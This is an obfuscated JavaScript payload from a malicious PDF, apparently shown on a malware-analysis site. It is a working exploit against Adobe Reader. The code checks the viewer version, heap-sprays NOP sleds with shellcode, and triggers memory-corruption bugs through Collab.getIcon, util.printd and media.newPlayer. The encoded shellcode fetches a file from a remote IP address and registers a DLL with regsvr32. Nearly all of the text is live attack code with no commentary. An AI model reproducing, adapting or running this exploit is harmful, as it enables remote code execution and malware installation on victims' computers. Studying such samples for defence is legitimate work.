var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u6D2F%u3079%u3039%u3139%u2F31%u3731%u3332%u3166%u3865%u3065%u3964%u6236%u6637%u6238%u6563%u6135%u6163%u6331%u6666%u3836%u3530%u642F%u2E37%u6870%u3F70%u3D66%u0067%u0000';var _2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u6D2F%u3079%u3039%u3139%u2F31%u3731%u3332%u3166%u3865%u3065%u3964%u6236%u6637%u6238%u6563%u6135%u6163%u6331%u6666%u3836%u3530%u642F%u2E38%u6870%u3F70%u3D66%u006E%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var _1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('
');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))||((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)||(_4o<=9200)||(_4o>=8103)||(_4o<=8107)){_5o();}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.